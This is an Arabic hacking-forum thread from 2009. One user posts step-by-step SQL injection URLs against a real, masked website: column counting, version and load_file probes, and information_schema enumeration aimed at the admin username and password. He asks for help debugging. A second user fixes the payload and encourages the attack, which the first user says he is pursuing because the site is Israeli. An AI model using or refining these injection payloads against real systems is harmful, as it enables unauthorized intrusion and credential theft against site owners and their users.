ثغرة حقن وجعت رااسي

T-72 · 09-14-2009, 03:41 PM

كيف الشباب

سؤالي اكيد بسيط بالنسبه الكن

رح اتركن مع الخطوات

http://********/etemplate.php?id=58 موقع مصاب

.................................................. .............................................

عدد الاعمده http://*******/etemplate.php?id=58+order+by+13

.................................................. ................................................

نفذت هاد الامر

http://******/etemplate.php?id=58+an...lect+1,2,3,4,5 ,6,7,8,9,10,11,12,13

ظهر العامود الخامس مصاب

.................................................. .................................................

انتقلت للامر لمعرفه اصدار القاعده

http://******/etemplate.php?id=58+an...lect+1,2,3,4,v ersion(),6,7,8,9,10,11,12,13

ظهر الاصدار 5.0.45-community-nt

.................................................. .................................................. ..........................

انتقلت للامر لفحص السيرفر load_file('/')

http://****/etemplate.php?id=58+and+...select+1,2,3,4, load_file('/'),6,7,8,9,10,11,12,13

ظهر خطأ ؟؟؟؟

طنشت الخطة هي

.................................................. .................................................. .......

انتقلت للامر

http://******/etemplate.php?id=58+an...lect+1,2,3,4,c oncat(table_name,0x3a,column_name,0x3a,table_schem a),6,7,8,9,10,11,12,13+from+information_schema.col umns

ظهر عواميد اليوزر و الباس

CHARACTER_SETS:CHARACTER_SET_NAME:information_sche ma

.................................................. .................................................

انتقلت للامر التالي لاجيب عامود الباسورد

where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)

طبعا كلمة pas مشفره تشفير mysql char

بعد تنفيذ الامر يظهر الخطأأ

لهون وصلت وم عاد فيي اتحرك خطوه

والحل ي شباب

شو المشكله وكيف فيني كمل

حاسس حالي صرت قريب من اسم الادمن والباسوورد

:00001793[1]: > مبسوط

الحل ي شباب

بر[ب]

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC eyvm prk ,[uj vhhsd

KaLa$nikoV · 09-15-2009, 11:36 AM

كيف وضعت الامر ادناه بالحقنه

اقتباس


	انتقلت للامر التالي لاجيب عامود الباسورد where+column_name+LIKE+CHAR(37, 112, 97, 115, 37) طبعا كلمة pas مشفره تشفير mysql char

كل خطواتك تمام بتمام
بس هذه الخطوه ما وضحتها انت كيف عملتها
اشي تاني يا ريت لو تضع الموقع لحتا نقدر نساعدك اكثر ولا تخاف ع الموقع
ما حد يخترقه قبلك ان شاء الله

T-72 · 09-15-2009, 10:50 PM

انا فعلا خايف حدا يخترقو قبلي

بس ملاحظه قبل م اخترقو
رح اعرف طبيعت الموقع

ازا كان يستاهل الاختراق ولا لا

وهي بتركا الك تقرر

لانو الموقع البلد : اسرائيل

رح كملك شو عملت انا
من النقطه اللي م فهمتها انتا

لاعرف العامود والجدول طبقت

الامر التالي

http://******/etemplate.php?id=58+an...E+LIKE+CHAR(37, 112, 97, 115, 37)

T-72 · 09-15-2009, 11:05 PM

ع فكرا

كل المواقع اللي حاولت فيها

صادفتني نفس المشكله

يعني بوصل لهون وم عاد اتقدم ولا خطوه

اكيد في خطأأ
رايح عن باالي

ي ريت تشرحي باقي الخطوات كيف

ناطر ردك بفارغ الصبر

بر[ب]

KaLa$nikoV · 09-16-2009, 12:07 AM

اقتباس

المشاركة الأصلية كتبت بواسطة ريتشل كوري


	انا فعلا خايف حدا يخترقو قبلي [url]http://******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7 ,6,7,8,9,10,11,12,13+from+information_schema.colum nswhere+CHARACTER_SET_NAME+LIKE+CHAR(37, 112, 97, 115, 37)

خطأك زي ما كنت متوقع

شوف علامه الزائد قبل كلمه where مش موجوده صح
ضيفها وشوف كيف الناتح من عندي

كود PHP:

   
******/etemplate.php?id=58+and+1=0+union+select+1,2,3,4,7,6,7,8,9,10,11,12,13+from+information_schema.columns+where+CHARACTER_SET_NAME+LIKE+CHAR(37, 112, 97, 115, 37)

مبروك الموقع الاسرائيلي يلا واصل اخي

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
ثغرة ميتا جديدة لإختراق ويندوز فيستا + شرح استغلالها , تحميل الميتا الجديد ! 500 ثغرة :]	Hαcĸer'ѕ Kιɴɢ	قســم إختــراق الأجهــزة	4	11-27-2010 04:01 AM
طلب ثغرة	Garwasha	جـــ'ابات العناكــ'ب	5	01-26-2010 08:13 AM
ثغرة من فرن	M!M0	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	4	01-07-2010 09:28 PM
[ثغرة]في نسخه 3.8.2	xman2	قســم تطويــر المــــواقع	0	09-27-2009 04:21 AM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

ثغرة حقن وجعت رااسي

جـــ'ابات العناكــ'ب